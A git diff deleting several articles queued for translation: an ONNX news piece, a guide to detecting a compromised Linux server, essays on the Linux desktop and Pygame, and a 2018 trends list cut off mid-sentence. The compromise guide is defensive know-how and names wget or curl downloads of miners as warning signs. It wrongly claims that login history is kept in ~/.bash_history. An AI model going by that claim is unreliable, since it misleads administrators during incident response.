-- but the rest of the ecosystem teaming up to compete with Google is what this boils down to," Kaul said. - -The Apache MXNet community earlier this month introduced version 0.12 of MXNet, which extends Gluon functionality to allow for new, cutting-edge research, according to AWS. Among its new features are variational dropout, which allows developers to apply the dropout technique for mitigating overfitting to recurrent neural networks. - -Convolutional RNN, Long Short-Term Memory and gated recurrent unit cells allow datasets to be modeled using time-based sequence and spatial dimensions, AWS noted. - -### Framework-Neutral Method - -"This looks like a great way to deliver inference regardless of which framework generated a model," said Paul Teich, principal analyst at [Tirias Research][6]. - -"This is basically a framework-neutral way to deliver inference," he told LinuxInsider. - -Cloud providers like AWS, Microsoft and others are under pressure from customers to be able to train on one network while delivering on another, in order to advance AI, Teich pointed out. - -"I see this as kind of a baseline way for these vendors to check the interoperability box," he remarked. - -"Framework interoperability is a good thing, and this will only help developers in making sure that models that they build on MXNet or Caffe or CNTK are interoperable," Tractica's Kaul pointed out. - -As to how this interoperability might apply in the real world, Teich noted that technologies such as natural language translation or speech recognition would require that Alexa's voice recognition technology be packaged and delivered to another developer's embedded environment. - -### Thanks, Open Source - -"Despite their competitive differences, these companies all recognize they owe a significant amount of their success to the software development advancements generated by the open source movement," said Jeff Kaplan, managing director of [ThinkStrategies][7]. - -"The Open Neural Network Exchange is committed to producing similar benefits and innovations in AI," he told LinuxInsider. - -A growing number of major technology companies have announced plans to use open source to speed the development of AI collaboration, in order to create more uniform platforms for development and research. - -AT&T just a few weeks ago announced plans [to launch the Acumos Project][8] with TechMahindra and The Linux Foundation. The platform is designed to open up efforts for collaboration in telecommunications, media and technology.  -![](https://www.ectnews.com/images/end-enn.gif) - --------------------------------------------------------------------------------- - -via: https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html - -作者:[ David Jones ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html#searchbyline -[1]:https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html# -[2]:https://www.linuxinsider.com/perl/mailit/?id=84971 -[3]:https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html -[4]:https://github.com/onnx/onnx -[5]:https://www.tractica.com/ -[6]:http://www.tiriasresearch.com/ -[7]:http://www.thinkstrategies.com/ -[8]:https://www.linuxinsider.com/story/84926.html -[9]:https://www.linuxinsider.com/story/AWS-to-Help-Build-ONNX-Open-Source-AI-Platform-84971.html diff --git a/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md b/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md deleted file mode 100644 index dd61ad7a95..0000000000 --- a/sources/tech/20171128 How To Tell If Your Linux Server Has Been Compromised.md +++ /dev/null @@ -1,156 +0,0 @@ -translating by lujun9972 -How To Tell If Your Linux Server Has Been Compromised --------------- - -A server being compromised or hacked for the purpose of this guide is an unauthorized person or bot logging into the server in order to use it for their own, usually negative ends. - -Disclaimer: If your server has been compromised by a state organization like the NSA or a serious criminal group then you will not notice any problems and the following techniques will not register their presence. - -However, the majority of compromised servers are carried out by bots i.e. automated attack programs, in-experienced attackers e.g. “script kiddies”, or dumb criminals. - -These sorts of attackers will abuse the server for all it’s worth whilst they have access to it and take few precautions to hide what they are doing. - -### Symptoms of a compromised server - -When a server has been compromised by an in-experienced or automated attacker they will usually do something with it that consumes 100% of a resource. This resource will usually be either the CPU for something like crypt-currency mining or email spamming, or bandwidth for launching a DOS attack. - -This means that the first indication that something is amiss is that the server is “going slow”. This could manifest in the website serving pages much slower than usual, or email taking many minutes to deliver or send. - -So what should you look for? - -### Check 1 - Who’s currently logged in? - -The first thing you should look for is who is currently logged into the server. It is not uncommon to find the attacker actually logged into the server and working on it. - -The shell command to do this is w. Running w gives the following output: - -``` - 08:32:55 up 98 days, 5:43, 2 users, load average: 0.05, 0.03, 0.00 -USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT -root pts/0 113.174.161.1 08:26 0.00s 0.03s 0.02s ssh root@coopeaa12 -root pts/1 78.31.109.1 08:26 0.00s 0.01s 0.00s w - -``` - -One of those IP’s is a UK IP and the second is Vietnamese. That’s probably not a good thing. - -Stop and take a breath, don’t panic and simply kill their SSH connection. Unless you can stop then re-entering the server they will do so quickly and quite likely kick you off and stop you getting back in. - -Please see the What should I do if I’ve been compromised section at the end of this guide no how to proceed if you do find evidence of compromise. - -The whois command can be run on IP addresses and will tell you what all the information about the organization that the IP is registered to, including the country. - -### Check 2 - Who has logged in? - -Linux servers keep a record of which users logged in, from what IP, when and for how long. This information is accessed with the last command. - -The output looks like this: - -``` -root pts/1 78.31.109.1 Thu Nov 30 08:26 still logged in -root pts/0 113.174.161.1 Thu Nov 30 08:26 still logged in -root pts/1 78.31.109.1 Thu Nov 30 08:24 - 08:26 (00:01) -root pts/0 113.174.161.1 Wed Nov 29 12:34 - 12:52 (00:18) -root pts/0 14.176.196.1 Mon Nov 27 13:32 - 13:53 (00:21) - -``` - -There is a mix of my UK IP’s and some Vietnamese ones, with the top two still logged in. If you see any IP’s that are not authorized then refer to the final section. - -The login history is contained in a text file at ~/.bash_history and is therefore easily removable. Often, attackers will simply delete this file to try to cover their tracks. Consequently, if you run last and only see your current login, this is a Bad Sign. - -If there is no login history be very, very suspicious and continue looking for indications of compromise. - -### Check 3 - Review the command history - -This level of attacker will frequently take no precautions to leave no command history so running the history command will show you everything they have done. Be on the lookout for wget or curl commands to download out-of-repo software such as spam bots or crypto miners. - -The command history is contained in the ~/.bash_history file so some attackers will delete this file to cover what they have done. Just as with the login history, if you run history and don’t see anything then the history file has been deleted. Again this is a Bad Sign and you should review the server very carefully. - -### Check 4 - What’s using all the CPU? - -The sorts of attackers that you will encounter usually don’t take too many precautions to hide what they are doing. So they will run processes that consume all the CPU. This generally makes it pretty easy to spot them. Simply run top and look at the highest process. - -This will also show people exploiting your server without having logged in. This could be, for example, someone using an unprotected form-mail script to relay spam. - -If you don’t recognize the top process then either Google its name or investigate what it’s doing with losf or strace. - -To use these tools first copy its PID from top and run: - -``` -strace -p PID - -``` - -This will display all the system calls the process is making. It’s a lot of information but looking through it will give you a good idea what’s going on. - -``` -lsof -p PID - -``` - -This program will list the open files that the process has. Again, this will give you a good idea what it’s doing by showing you what files it is accessing. - -### Check 5 - Review the all the system processes - -If an unauthorized process is not consuming enough CPU to get listed noticeably on top it will still get displayed in a full process listing with ps. My proffered command is ps auxf for providing the most information clearly. - -You should be looking for any processes that you don’t recognize. The more times you run ps on your servers (which is a good habit to get into) the more obvious an alien process will stand out. - -### Check 6 - Review network usage by process - -The command iftop functions like top to show a ranked list of processes that are sending and receiving network data along with their source and destination. A process like a DOS attack or spam bot will immediately show itself at the top of the list. - -### Check 7 - What processes are listening for network connections? - -Often an attacker will install a program that doesn’t do anything except listen on the network port for instructions. This does not consume CPU or bandwidth whilst it is waiting so can get overlooked in the top type commands. - -The commands lsof and netstat will both list all networked processes. I use them with the following options: - -``` -lsof -i - -``` - -``` -netstat -plunt - -``` - -You should look for any process that is listed as in the LISTEN or ESTABLISHED status as these processes are either waiting for a connection (LISTEN) or have a connection open (ESTABLISHED). If you don’t recognize these processes use strace or lsof to try to see what they are doing. - -### What should I do if I’ve been compromised? - -The first thing to do is not to panic, especially if the attacker is currently logged in. You need to be able to take back control of the machine before the attacker is aware that you know about them. If they realize you know about them they may well lock you out of your server and start destroying any assets out of spite. - -If you are not very technical then simply shut down the server. Either from the server itself with shutdown -h now or systemctl poweroff. Or log into your hosting provider’s control panel and shut down the server. Once it’s powered off you can work on the needed firewall rules and consult with your provider in your own time. - -If you’re feeling a bit more confident and your hosting provider has an upstream firewall then create and enable the following two rules in this order: - -1. Allow SSH traffic from only your IP address. - -2. Block everything else, not just SSH but every protocol on every port. - -This will immediately kill their SSH session and give only you access to the server. - -If you don’t have access to an upstream firewall then you will have to create and enable these firewall rules on the server itself and then, when they are in place kill the attacker’s ssh session with the kill command. - -A final method, where available, is to log into the server via an out-of-band connection such as the serial console and stop networking with systemctl stop network.service. This will completely stop any network access so you can now enable the firewall rules in your own time. - -Once you have regained control of the server do not trust it. - -Do not attempt to fix things up and continue using the server. You can never be sure what the attacker did and so you can never sure the server is secure. - -The only sensible course of action is to copy off all the data that you need and start again from a fresh install. - --------------------------------------------------------------------------------- - -via: https://bash-prompt.net/guides/server-hacked/ - -作者:[Elliot Cooper][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://bash-prompt.net diff --git a/sources/tech/20171128 The politics of the Linux desktop.md b/sources/tech/20171128 The politics of the Linux desktop.md deleted file mode 100644 index c9117dacfe..0000000000 --- a/sources/tech/20171128 The politics of the Linux desktop.md +++ /dev/null @@ -1,110 +0,0 @@ -The politics of the Linux desktop -============================================================ - -### If you're working in open source, why would you use anything but Linux as your main desktop? - - -![The politics of the Linux desktop](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/BUSINESS_networks.png?itok=XasNXxKs "The politics of the Linux desktop") -Image by : opensource.com - -At some point in 1997 or 1998—history does not record exactly when—I made the leap from Windows to the Linux desktop. I went through quite a few distributions, from Red Hat to SUSE to Slackware, then Debian, Debian Experimental, and (for a long time thereafter) Ubuntu. When I accepted a role at Red Hat, I moved to Fedora, and migrated both my kids (then 9 and 11) to Fedora as well. - -More Linux resources - -* [What is Linux?][1] - -* [What are Linux containers?][2] - -* [Download Now: Linux commands cheat sheet][3] - -* [Advanced Linux commands cheat sheet][4] - -* [Our latest Linux articles][5] - -For a few years, I kept Windows as a dual-boot option, and then realised that, if I was going to commit to Linux, then I ought to go for it properly. In losing Windows, I didn't miss much; there were a few games that I couldn't play, but it was around the time that the Civilization franchise was embracing Linux, so that kept me happy. - -The move to Linux wasn't plain sailing, by any stretch of the imagination. If you wanted to use fairly new hardware in the early days, you had to first ensure that there were  _any_  drivers for Linux, then learn how to compile and install them. If they were not quite my friends, **lsmod** and **modprobe** became at least close companions. I taught myself to compile a kernel and tweak the options to make use of (sometimes disastrous) new, "EXPERIMENTAL" features as they came out. Early on, I learned the lesson that you should always keep at least one kernel in your [LILO][12] list that you were  _sure_  booted fully. I cursed NVidia and grew horrified by SCSI. I flirted with early journalling filesystem options and tried to work out whether the different preempt parameters made any noticeable difference to my user experience or not. I began to accept that printers would never print—and then they started to. I discovered that the Bluetooth stack suddenly started to connect to things. - -Over the years, using Linux moved from being an uphill struggle to something that just worked. I moved my mother-in-law and then my father over to Linux so I could help administer their machines. And then I moved them off Linux so they could no longer ask me to help administer their machines. - -Over the years, using Linux moved from being an uphill struggle to something that just worked.It wasn't just at home, either: I decided that I would use Linux as my desktop for work, as well. I even made it a condition of employment for at least one role. Linux desktop support in the workplace caused different sets of problems. The first was the "well, you're on your own: we're not going to support you" email from IT support. VPNs were touch and go, but in the end, usually go. - -The biggest hurdle was Microsoft Office, until I discovered [CrossOver][13], which I bought with my own money, and which allowed me to run company-issued copies of Word, PowerPoint, and the rest on my Linux desktop. Fonts were sometimes a problem, and one company I worked for required Microsoft Lync. For this, and for a few other applications, I would sometimes have to run a Windows virtual machine (VM) on my Linux desktop.  Was this a cop out?  Well, a little bit: but I've always tried to restrict my usage of this approach to the bare minimum. - -### But why? - -"Why?" colleagues would ask. "Why do you bother? Why not just run Windows?" - -"Because I enjoy pain," was usually my initial answer, and then the more honest, "because of the principle of the thing." - -So this is it: I believe in open source. We have a number of very, very good desktop-compatible distributions these days, and most of the time they just work. If you use well-known or supported hardware, they're likely to "just work" pretty much as well as the two obvious alternatives, Windows or Mac. And they just work because many people have put much time into using them, testing them, and improving them. So it's not a case of why wouldn't I use Windows or Mac, but why would I ever consider  _not_  using Linux? If, as I do, you believe in open source, and particularly if you work within the open source community or are employed by an open source organisation, I struggle to see why you would even consider not using Linux. - -So it's not a case of why wouldn't I use Windows or Mac, but why would I ever consider not using Linux?I've spoken to people about this (of course I have), and here are the most common reasons—or excuses—I've heard. - -1. I'm more productive on Windows/Mac. - -2. I can't use app X on Linux, and I need it for my job. - -3. I can't game on Linux. - -4. It's what our customers use, so why we would alienate them? - -5. "Open" means choice, and I prefer a proprietary desktop, so I use that. - -Interestingly, I don't hear "Linux isn't good enough" much anymore, because it's manifestly untrue, and I can show that my own experience—and that of many colleagues—belies that. - -### Rebuttals - -If you believe in open source, then I contest that you should take the time to learn how to use a Linux desktop and the associated applications.Let's go through those answers and rebut them. - -1. **I'm more productive on Windows/Mac.** I'm sure you are. Anyone is more productive when they're using a platform or a system they're used to. If you believe in open source, then I contest that you should take the time to learn how to use a Linux desktop and the associated applications. If you're working for an open source organisation, they'll probably help you along, and you're unlikely to find you're much less productive in the long term. And, you know what? If you are less productive in the long term, then get in touch with the maintainers of the apps that are causing you to be less productive and help improve them. You don't have to be a coder. You could submit bug reports, suggest improvements, write documentation, or just test the most recent versions of the software. And then you're helping yourself and the rest of the community. Welcome to open source. - -1. **I can't use app X on Linux, and I need it for my job.** This may be true. But it's probably less true than you think. The people most often saying this with conviction are audio, video, or graphics experts. It was certainly the case for many years that Linux lagged behind in those areas, but have a look and see what the other options are. And try them, even if they're not perfect, and see how you can improve them. Alternatively, use a VM for that particular app. - -1. **I can't game on Linux.** Well, you probably can, but not all the games that you enjoy. This, to be clear, shouldn't really be an excuse not to use Linux for most of what you do. It might be a reason to keep a dual-boot system or to do what I did (after much soul-searching) and buy a games console (because Elite Dangerous really  _doesn't_  work on Linux, more's the pity). It should also be an excuse to lobby for your favourite games to be ported to Linux. - -1. **It's what our customers use, so why would we alienate them?** I don't get this one. Does Microsoft ban visitors with Macs from their buildings? Does Apple ban Windows users? Does Google allow non-Android phones through their doors? You don't kowtow to the majority when you're the little guy or gal; if you're working in open source, surely you should be proud of that. You're not going to alienate your customer—you're really not. - -1. **"Open" means choice, and I prefer a proprietary desktop, so I use that.**Being open certainly does mean you have a choice. You made that choice by working in open source. For many, including me, that's a moral and philosophical choice. Saying you embrace open source, but rejecting it in practice seems mealy mouthed, even insulting. Using openness to justify your choice is the wrong approach. Saying "I prefer a proprietary desktop, and company policy allows me to do so" is better. I don't agree with your decision, but at least you're not using the principle of openness to justify it. - -Is using open source easy? Not always. But it's getting easier. I think that we should stand up for what we believe in, and if you're reading [Opensource.com][14], then you probably believe in open source. And that, I believe, means that you should run Linux as your main desktop. - - _Note: I welcome comments, and would love to hear different points of view. I would ask that comments don't just list application X or application Y as not working on Linux. I concede that not all apps do. I'm more interested in justifications that I haven't covered above, or (perceived) flaws in my argument. Oh, and support for it, of course._ - - -### About the author - - [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/2017-05-10_0129.jpg?itok=Uh-eKFhx)][15] - - Mike Bursell - I've been in and around Open Source since around 1997, and have been running (GNU) Linux as my main desktop at home and work since then: [not always easy][7]...  I'm a security bod and architect, and am currently employed as Chief Security Architect for Red Hat.  I have a blog - "[Alice, Eve & Bob][8]" - where I write (sometimes rather parenthetically) about security.  I live in the UK and... [more about Mike Bursell][9][More about me][10] - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/11/politics-linux-desktop - -作者:[Mike Bursell ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/mikecamel -[1]:https://opensource.com/resources/what-is-linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[2]:https://opensource.com/resources/what-are-linux-containers?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[3]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[4]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[5]:https://opensource.com/tags/linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[6]:https://opensource.com/article/17/11/politics-linux-desktop?rate=do69ixoNzK0yg3jzFk0bc6ZOBsIUcqTYv6FwqaVvzUA -[7]:https://opensource.com/article/17/11/politics-linux-desktop -[8]:https://aliceevebob.com/ -[9]:https://opensource.com/users/mikecamel -[10]:https://opensource.com/users/mikecamel -[11]:https://opensource.com/user/105961/feed -[12]:https://en.wikipedia.org/wiki/LILO_(boot_loader) -[13]:https://en.wikipedia.org/wiki/CrossOver_(software) -[14]:https://opensource.com/ -[15]:https://opensource.com/users/mikecamel -[16]:https://opensource.com/users/mikecamel -[17]:https://opensource.com/users/mikecamel -[18]:https://opensource.com/article/17/11/politics-linux-desktop#comments -[19]:https://opensource.com/tags/linux diff --git a/sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md b/sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md deleted file mode 100644 index 479bfb1232..0000000000 --- a/sources/tech/20171128 Why Python and Pygame are a great pair for beginning programmers.md +++ /dev/null @@ -1,142 +0,0 @@ -Why Python and Pygame are a great pair for beginning programmers -============================================================ - -### We look at three reasons Pygame is a good choice for learning to program. - - -![What's the best game platform for beginning programmers?](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/code_development_programming.png?itok=M_QDcgz5 "What's the best game platform for beginning programmers?") -Image by :  - -opensource.com - -Last month, [Scott Nesbitt][10] wrote about [Mozilla awarding $500K to support open source projects][11]. Phaser, a HTML/JavaScript game platform, was [awarded $50,000][12]. I’ve been teaching Phaser to my pre-teen daughter for a year, and it's one of the best and easiest HTML game development platforms to learn. [Pygame][13], however, may be a better choice for beginners. Here's why. - -### 1\. One long block of code - -Pygame is based on Python, the [most popular language for introductory computer courses][14]. Python is great for writing out ideas in one long block of code. Kids start off with a single file and with a single block of code. Before they can get to functions or classes, they start with code that will soon resemble spaghetti. It’s like finger-painting, as they throw thoughts onto the page. - -More Python Resources - -* [What is Python?][1] - -* [Top Python IDEs][2] - -* [Top Python GUI frameworks][3] - -* [Latest Python content][4] - -* [More developer resources][5] - -This approach to learning works. Kids will naturally start to break things into functions and classes as their code gets more difficult to manage. By learning the syntax of a language like Python prior to learning about functions, the student will gain basic programming knowledge before using global and local scope. - -Most HTML games separate the structure, style, and programming logic into HTML, CSS, and JavaScript to some degree and require knowledge of CSS and HTML. While the separation is better in the long term, it can be a barrier for beginners. Once kids realize that they can quickly build web pages with HTML and CSS, they may get distracted by the visual excitement of colors, fonts, and graphics. Even those who stay focused on JavaScript coding will still need to learn the basic document structure that the JavaScript code sits in. - -### 2\. Global variables are more obvious - -Both Python and JavaScript use dynamically typed variables, meaning that a variable becomes a string, an integer, or float when it’s assigned; however, making mistakes is easier in JavaScript. Similar to typed variables, both JavaScript and Python have global and local variable scopes. In Python, global variables inside of a function are identified with the global keyword. - -Let’s look at the basic [Making your first Phaser game tutorial][15], by Alvin Ourrad and Richard Davey, to understand the challenge of using Phaser to teach programming to beginners. In JavaScript, global variables—variables that can be accessed anywhere in the program—are difficult to keep track of and often are the source of bugs that are challenging to solve. Richard and Alvin are expert programmers and use global variables intentionally to keep things concise. - -``` -var game = new Phaser.Game(800, 600, Phaser.AUTO, '', { preload: preload, create: create, update: update }); - -function preload() { - -    game.load.image('sky', 'assets/sky.png'); - -} - -var player; -var platforms; - -function create() { -    game.physics.startSystem(Phaser.Physics.ARCADE); -… -``` - -In their Phaser programming book  [_Interphase_ ,][16] Richard Davey and Ilija Melentijevic explain that global variables are commonly used in many Phaser projects because they make it easier to get things done quickly. - -> “If you’ve ever worked on a game of any significant size then this approach is probably already making you cringe slightly... So why do we do it? The reason is simply because it’s the most concise and least complicated way to demonstrate what Phaser can do.” - -Although structuring a Phaser application to use local variables and split things up nicely into separation of concerns is possible, that’s tough for kids to understand when they’re first learning to program. - -If you’re set on teaching your kids to code with JavaScript, or if they already know how to code in another language like Python, a good Phaser course is [The Complete Mobile Game Development Course][17], by [Pablo Farias Navarro][18]. Although the title focuses on mobile games, the actual course focuses on JavaScript and Phaser. The JavaScript and Phaser apps are moved to a mobile phone with [PhoneGap][19]. - -### 3\. Pygame comes with less assembly required - -Thanks to [Python Wheels][20], Pygame is now super [easy to install][21]. You can also install it on Fedora/Red Hat with the **yum** package manager: - -``` -sudo yum install python3-pygame -``` - -See the official [Pygame installation documentation][22] for more information. - -Although Phaser itself is even easier to install, it does require more knowledge to use. As mentioned previously, the student will need to assemble their JavaScript code within an HTML document with some CSS. In addition to the three languages—HTML, CSS, and JavaScript—Phaser also requires the use of Firefox or Chrome development tools and an editor. The most common editors for JavaScript are Sublime, Atom, VS Code (probably in that order). - -Phaser applications will not run if you open the HTML file in a browser directly, due to [same-origin policy][23]. You must run a web server and access the files by connecting to the web server. Fortunately, you don’t need to run Apache on your local computer; you can run something lightweight like [httpster][24] for most projects. - -### Advantages of Phaser and JavaScript - -With all the challenges of JavaScript and Phaser, why am I teaching them? Honestly, I held off for a long time. I worried about students learning variable hoisting and scope. I developed my own curriculum based on Pygame and Python, then I developed one based on Phaser. Eventually, I decided to use Pablo’s pre-made curriculum as a starting point.  - -There are really two reasons that I moved to JavaScript. First, JavaScript has emerged as a serious language used in serious applications. In addition to web applications, it’s used for mobile and server applications. JavaScript is everywhere, and it’s used widely in applications kids see every day. If their friends code in JavaScript, they'll likely want to as well. As I saw the momentum behind JavaScript, I looked into alternatives that could compile into JavaScript, primarily Dart and TypeScript. I didn’t mind the extra conversion step, but I still looked at JavaScript. - -In the end, I chose to use Phaser and JavaScript because I realized that the problems could be solved with JavaScript and a bit of work. High-quality debugging tools and the work of some exceptionally smart people have made JavaScript a language that is both accessible and useful for teaching kids to code. - -### Final word: Python vs. JavaScript - -When people ask me what language to start their kids with, I immediately suggest Python and Pygame. There are tons of great curriculum options, many of which are free. I used ["Making Games with Python & Pygame"][25] by Al Sweigart with my son. I also used  _[Think Python: How to Think Like a Computer Scientist][7]_ by Allen B. Downey. You can get Pygame on your Android phone with [RAPT Pygame][26] by [Tom Rothamel][27]. - -Despite my recommendation, I always suspect that kids soon move to JavaScript. And that’s okay—JavaScript is a mature language with great tools. They’ll have fun with JavaScript and learn a lot. But after years of helping my daughter’s older brother create cool games in Python, I’ll always have an emotional attachment to Python and Pygame. - -### About the author - - [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/craig-head-crop.png?itok=LlMnIq8m)][28] - - Craig Oda - First elected president and co-founder of Tokyo Linux Users Group. Co-author of "Linux Japanese Environment" book published by O'Reilly Japan. Part of core team that established first ISP in Asia. Former VP of product management and product marketing for major Linux company. Partner at Oppkey, developer relations consulting firm in Silicon Valley.[More about me][8] - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/11/pygame - -作者:[Craig Oda ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/codetricity -[1]:https://opensource.com/resources/python?intcmp=7016000000127cYAAQ -[2]:https://opensource.com/resources/python/ides?intcmp=7016000000127cYAAQ -[3]:https://opensource.com/resources/python/gui-frameworks?intcmp=7016000000127cYAAQ -[4]:https://opensource.com/tags/python?intcmp=7016000000127cYAAQ -[5]:https://developers.redhat.com/?intcmp=7016000000127cYAAQ -[6]:https://opensource.com/article/17/11/pygame?rate=PV7Af00S0QwicZT2iv8xSjJrmJPdpfK1Kcm7LXxl_Xc -[7]:http://greenteapress.com/thinkpython/html/index.html -[8]:https://opensource.com/users/codetricity -[9]:https://opensource.com/user/46031/feed -[10]:https://opensource.com/users/scottnesbitt -[11]:https://opensource.com/article/17/10/news-october-14 -[12]:https://www.patreon.com/photonstorm/posts -[13]:https://www.pygame.org/news -[14]:https://cacm.acm.org/blogs/blog-cacm/176450-python-is-now-the-most-popular-introductory-teaching-language-at-top-u-s-universities/fulltext -[15]:http://phaser.io/tutorials/making-your-first-phaser-game -[16]:https://phaser.io/interphase -[17]:https://academy.zenva.com/product/the-complete-mobile-game-development-course-platinum-edition/ -[18]:https://gamedevacademy.org/author/fariazz/ -[19]:https://phonegap.com/ -[20]:https://pythonwheels.com/ -[21]:https://pypi.python.org/pypi/Pygame -[22]:http://www.pygame.org/wiki/GettingStarted#Pygame%20Installation -[23]:https://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html -[24]:https://simbco.github.io/httpster/ -[25]:https://inventwithpython.com/makinggames.pdf -[26]:https://github.com/renpytom/rapt-pygame-example -[27]:https://github.com/renpytom -[28]:https://opensource.com/users/codetricity -[29]:https://opensource.com/users/codetricity -[30]:https://opensource.com/users/codetricity -[31]:https://opensource.com/article/17/11/pygame#comments -[32]:https://opensource.com/tags/python -[33]:https://opensource.com/tags/programming diff --git a/sources/tech/20171129 10 open source technology trends for 2018.md b/sources/tech/20171129 10 open source technology trends for 2018.md deleted file mode 100644 index eb21c62ec9..0000000000 --- a/sources/tech/20171129 10 open source technology trends for 2018.md +++ /dev/null @@ -1,143 +0,0 @@ -translating by wangy325... - - -10 open source technology trends for 2018 -============================================================ - -### What do you think will be the next open source tech trends? Here are 10 predictions. - -![10 open source technology trends for 2018](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/fireworks-newyear-celebrate.png?itok=6gXaznov "10 open source technology trends for 2018") -Image by : [Mitch Bennett][10]. Modified by Opensource.com. [CC BY-SA 4.0][11] - -Technology is always evolving. New developments, such as OpenStack, Progressive Web Apps, Rust, R, the cognitive cloud, artificial intelligence (AI), the Internet of Things, and more are putting our usual paradigms on the back burner. Here is a rundown of the top open source trends expected to soar in popularity in 2018. - -### 1\. OpenStack gains increasing acceptance - -[OpenStack][12] is essentially a cloud operating system that offers admins the ability to provision and control huge compute, storage, and networking resources through an intuitive and user-friendly dashboard. - -Many enterprises are using the OpenStack platform to build and manage cloud computing systems. Its popularity rests on its flexible ecosystem, transparency, and speed. It supports mission-critical applications with ease and lower costs compared to alternatives. But, OpenStack's complex structure and its dependency on virtualization, servers, and extensive networking resources has inhibited its adoption by a wider range of enterprises. Using OpenStack also requires a well-oiled machinery of skilled staff and resources. - -The OpenStack Foundation is working overtime to fill the voids. Several innovations, either released or on the anvil, would resolve many of its underlying challenges. As complexities decrease, OpenStack will surge in acceptance. The fact that OpenStack is already backed by many big software development and hosting companies, in addition to thousands of individual members, makes it the future of cloud computing. - -### 2\. Progressive Web Apps become popular - -[Progressive Web Apps][13] (PWA), an aggregation of technologies, design concepts, and web APIs, offer an app-like experience in the mobile browser. - -Traditional websites suffer from many inherent shortcomings. Apps, although offering a more personal and focused engagement than websites, place a huge demand on resources, including needing to be downloaded upfront. PWA delivers the best of both worlds. It delivers an app-like experience to users while being accessible on browsers, indexable on search engines, and responsive to fit any form factor. Like an app, a PWA updates itself to always display the latest real-time information, and, like a website, it is delivered in an ultra-safe HTTPS model. It runs in a standard container and is accessible to anyone who types in the URL, without having to install anything. - -PWAs perfectly suit the needs of today's mobile users, who value convenience and personal engagement over everything else. That this technology is set to soar in popularity is a no-brainer. - -### 3\. Rust to rule the roost - -Most programming languages come with safety vs. control tradeoffs. [Rust][14] is an exception. The language co-opts extensive compile-time checking to offer 100% control without compromising safety. The last [Pwn2Own][15] competition threw up many serious vulnerabilities in Firefox on account of its underlying C++ language. If Firefox had been written in Rust, many of those errors would have manifested as compile-time bugs and resolved before the product rollout stage. - -Rust's unique approach of built-in unit testing has led developers to consider it a viable first-choice open source language. It offers an effective alternative to languages such as C and Python to write secure code without sacrificing expressiveness. Rust has bright days ahead in 2018. - -### 4\. R user community grows - -The [R][16] programming language, a GNU project, is associated with statistical computing and graphics. It offers a wide array of statistical and graphical techniques and is extensible to boot. It starts where [S][17] ends. With the S language already the vehicle of choice for research in statistical methodology, R offers a viable open source route for data manipulation, calculation, and graphical display. An added benefit is R's attention to detail and care for the finer nuances. - -Like Rust, R's fortunes are on the rise. - -### 5\. XaaS expands in scope - -XaaS, an acronym for "anything as a service," stands for the increasing number of services delivered over the internet, rather than on premises. Although software as a service (SaaS), infrastructure as a service (IaaS), and platform as a service (PaaS) are well-entrenched, new cloud-based models, such as network as a service (NaaS), storage as a service (SaaS or StaaS), monitoring as a service (MaaS), and communications as a service (CaaS), are soaring in popularity. A world where anything and everything is available "as a service" is not far away. - -The scope of XaaS now extends to bricks-and-mortar businesses, as well. Good examples are companies such as Uber and Lyft leveraging digital technology to offer transportation as a service and Airbnb offering accommodations as a service. - -High-speed networks and server virtualization that make powerful computing affordable have accelerated the popularity of XaaS, to the point that 2018 may become the "year of XaaS." The unmatched flexibility, agility, and scalability will propel the popularity of XaaS even further. - -### 6\. Containers gain even more acceptance - -Container technology is the approach of packaging pieces of code in a standardized way so they can be "plugged and run" quickly in any environment. Container technology allows enterprises to cut costs and implementation times. While the potential of containers to revolutionize IT infrastructure has been evident for a while, actual container use has remained complex. - -Container technology is still evolving, and the complexities associated with the technology decrease with every advancement. The latest developments make containers quite intuitive and as easy as using a smartphone, not to mention tuned for today's needs, where speed and agility can make or break a business. - -### 7\. Machine learning and artificial intelligence expand in scope - -[Machine learning and AI][18] give machines the ability to learn and improve from experience without a programmer explicitly coding the instruction. - -These technologies are already well entrenched, with several open source technologies leveraging them for cutting-edge services and applications. - -[Gartner predicts][19] the scope of machine learning and artificial intelligence will expand 